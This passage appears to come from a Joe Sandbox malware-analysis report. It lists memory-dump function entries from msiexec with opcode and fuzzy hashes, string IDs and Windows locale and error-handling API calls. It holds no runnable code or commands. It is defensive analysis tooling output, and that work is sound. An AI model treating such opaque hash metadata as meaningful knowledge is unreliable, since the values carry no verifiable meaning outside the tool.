                                                                                                                                                                                                                                • Instruction ID: 842ed2a94abca4e1b13f8c995240a28756852e5fdf5eb5899f715461b5560e1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1629029ed88303f2527931de766cb5efee36cdf5a11dcab88c9be6366602f41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A251C4B16203099BEB219F24CC86B77B3A9EF45794F054568FA89CB2A0F374DD10C761
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: lS
                                                                                                                                                                                                                                • API String ID: 0-2062759450
                                                                                                                                                                                                                                • Opcode ID: 580186c77df95057a97465fd8cde484e05b64b5e99d1913bb954703ce0fdbc9f
                                                                                                                                                                                                                                • Instruction ID: f07d87eb759c11e180210ac2f5d9c6547ae0928b8a5123482a6ef25f4c1c738b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 580186c77df95057a97465fd8cde484e05b64b5e99d1913bb954703ce0fdbc9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9C188716143098BCB25DF24C89267BF3E6EFA1354F0A883CEA85873A1E7749915C792
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5fb4fe2629f41e51c49cd0f2d0880e5ebe84e8ca4a1d0756a1d2479931c73469
                                                                                                                                                                                                                                • Instruction ID: aa3f93c31cb8c00ae3220b6455e4dddc36f02d5cbb4e9204587eb960a3b4679f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb4fe2629f41e51c49cd0f2d0880e5ebe84e8ca4a1d0756a1d2479931c73469
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F64183B5C04219AEDFA4DF79CC88AAAB7B9AB46200F1446DDE41DD3200DB359E85CF60
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: B40
                                                                                                                                                                                                                                • API String ID: 0-296502247
                                                                                                                                                                                                                                • Opcode ID: 746ce9acb993c4dc55a2cb171c5cec22054919d1cdfaf9ddfe8c10447c1fa8a7
                                                                                                                                                                                                                                • Instruction ID: ca92bb85159764bda0cbc00658ad44d24ae13ff4cd9a1d10c78ce643813b6fc0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 746ce9acb993c4dc55a2cb171c5cec22054919d1cdfaf9ddfe8c10447c1fa8a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DC13571909381DFD7268F28E89035ABBF6BF86314F19866CE099873E1C734DA45CB91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B7E4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                • Opcode ID: e632ccb6d11957688a6dbc0775854d2ec43abfea889256bea6e6f3f1f949c94e
                                                                                                                                                                                                                                • Instruction ID: 73c10599a5e3215bb1ebdd6235bce8b94a9ad850b586d491e990f55b78cb9a43
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e632ccb6d11957688a6dbc0775854d2ec43abfea889256bea6e6f3f1f949c94e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721D772A19107ABDFAC9E25EC41A7B73A9EF49710F14007EED11C6140EB74D940DB70
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: LY.
                                                                                                                                                                                                                                • API String ID: 0-829310564
                                                                                                                                                                                                                                • Opcode ID: 60ccbac91ae3ca17053d58424569555d4f5315cd636df51465ff69a753637be8
                                                                                                                                                                                                                                • Instruction ID: 25e90481dfdbc77111e3fe88e66a3e2bbf1322148840e283dffa8985f3f1a912
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60ccbac91ae3ca17053d58424569555d4f5315cd636df51465ff69a753637be8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE13275210B41DFC725CF29C940A56BBF2BB99310F188A5DE98A8BB61C731F865CF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619B53D,00000001,00000000,?,-00000050,?,0619BB71,00000000,?,?,?,00000055,?), ref: 0619B489
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                • Opcode ID: 887f110d84c8b0d9e4c364463882c065f669aba86da0415bb007e8f7faddd2eb
                                                                                                                                                                                                                                • Instruction ID: c2ed35b3887d91a843d6af45314d01ec9c2807ee7e0aac9c234185622f89a831
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 887f110d84c8b0d9e4c364463882c065f669aba86da0415bb007e8f7faddd2eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB11E9376147059FDF189F39D89157BB7A2FF80368B18442CD94787B40D371A542DB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0619B759,00000000,00000000,?), ref: 0619B9EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                • Opcode ID: 58b1fb8f0dd7e5776d46cd61d0babbc3828ad3db15a8ac83069157938b13478f
                                                                                                                                                                                                                                • Instruction ID: c498f99bed9c6c1d3c0d25c7b052d243e127d521174be41f18ffbd212b31c52b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58b1fb8f0dd7e5776d46cd61d0babbc3828ad3db15a8ac83069157938b13478f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D636E24116BFEF6C5A65EC467BB3764EB40654F054829EC12E3190EB70EE41C6A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619B790,00000001,?,?,-00000050,?,0619BB39,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0619B4FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                • Opcode ID: 55a25ba41357a30a95e8fe2451480d623b156391e7c7af48326a48702b543d6e
                                                                                                                                                                                                                                • Instruction ID: 229f93856d48e78a697df901d4a202973bf07401e96f9f7860fd2505f638027c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a25ba41357a30a95e8fe2451480d623b156391e7c7af48326a48702b543d6e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9F0F6366043046FDF246F35EC81A7BBB91EF80768F05842CF9068B680C7719C42DAA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0618E31B: EnterCriticalSection.KERNEL32(?,?,0618F4F0,00000000,061AA320,0000000C,0618F4B8,?,?,06194172,?,?,06192C5D,00000001,00000364,?), ref: 0618E32A
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619419C,00000001,061AA5E8,0000000C,06194574,00000000), ref: 061941E1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                • Opcode ID: 7f648633cef855715e02adc42cb486e378d21a103088b10e6067b27c2abde926
                                                                                                                                                                                                                                • Instruction ID: 858f29a3437016bb387d4ff9a8aa6d9ce2afc91ab6136916c41f338b4bf5e3e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f648633cef855715e02adc42cb486e378d21a103088b10e6067b27c2abde926
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81F06DB6A04300EFDB80EFA8E801B9D77F1FB89721F10812AE910DB290DBB59941CF50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619B325,00000001,?,?,?,0619BB93,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0619B403
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                • Opcode ID: 8850dff708348490996c8c6156d9fac05315df20bdf6b6fe2b5d1dc91883d093
                                                                                                                                                                                                                                • Instruction ID: da9fc4eec5d4761a21d5eb27845e104368a2390de4baa364a7ae82ecea85d078
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8850dff708348490996c8c6156d9fac05315df20bdf6b6fe2b5d1dc91883d093
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF0E536B0420567CF14EF36E84577BBFA5EFC1720F0A4059EA058B650C7719A82CBA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,061918F7,?,20001004,00000000,00000002,?,?,06190EE9), ref: 061946AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                                • Opcode ID: cc81c07e2ddcc7a1f3a65d12c001134ef5f1a2af65c98397500db5e5c5aee3cf
                                                                                                                                                                                                                                • Instruction ID: ee5a35ea5a3ef2c57902cbb21c9d11ea68bfe04e75f608b587fd80212214db6b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc81c07e2ddcc7a1f3a65d12c001134ef5f1a2af65c98397500db5e5c5aee3cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E04F35900258BBCF522FB1EC04AAE7FA6FF44761F008011FE1565210CB318D62EAE8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                • API String ID: 0-3772416878
                                                                                                                                                                                                                                • Opcode ID: 26549021a90ba4768a4d7eadab726b852d49b59af1e6f3f7c0a26cf387e615e4
                                                                                                                                                                                                                                • Instruction ID: e606686059fca0c12daa76764e1abb6154fe63c4e9a426a8b4cc28aebb672d86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26549021a90ba4768a4d7eadab726b852d49b59af1e6f3f7c0a26cf387e615e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09B159701083819FC321CF19C88461BFBE1AFA9704F848E2DE5D997742D675E918CBA7
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00008D3E,061883B5), ref: 06188D37
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                • Opcode ID: d13536794441dced315842706ce5239ce53498863d474c2c9c08297440b5960b
                                                                                                                                                                                                                                • Instruction ID: d793cccd416f97157c1475de676b7af8fadcf2fd3aa0a8310c7e7bf4a81e9db3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d13536794441dced315842706ce5239ce53498863d474c2c9c08297440b5960b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: MO
                                                                                                                                                                                                                                • API String ID: 0-416165641
                                                                                                                                                                                                                                • Opcode ID: 37b70435362a126c619f60fcc0ff4818873acaa9fb12f1424e75152261306f24
                                                                                                                                                                                                                                • Instruction ID: 3d42e60882d57cc302052d018264b4cf0a17c5bf945b811536dcbb488c217a70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37b70435362a126c619f60fcc0ff4818873acaa9fb12f1424e75152261306f24
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD8111715183128BC324DF24C8816ABF7F2FFD57A4F198A2DE9C54B264EB708852CB46
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0<2U
                                                                                                                                                                                                                                • API String ID: 0-175098435
                                                                                                                                                                                                                                • Opcode ID: ff3db8aa8e80e2768697d64b9efa31e4291812778588ea49900d9affbb31ce3d
                                                                                                                                                                                                                                • Instruction ID: cf842bad0c69833878909a7a52f4c8334f0fd756ecec95e0762161f6ddb654f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff3db8aa8e80e2768697d64b9efa31e4291812778588ea49900d9affbb31ce3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51475042C3D24BE7168F35946177BFFD08FA7358F185A6CE1D687283DA69814ACB12
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0<2U
                                                                                                                                                                                                                                • API String ID: 0-175098435
                                                                                                                                                                                                                                • Opcode ID: 7a4cd27ad352e16175e0a2b1d2c60fbcd112a54415a76dd777f7cf901c933ecc
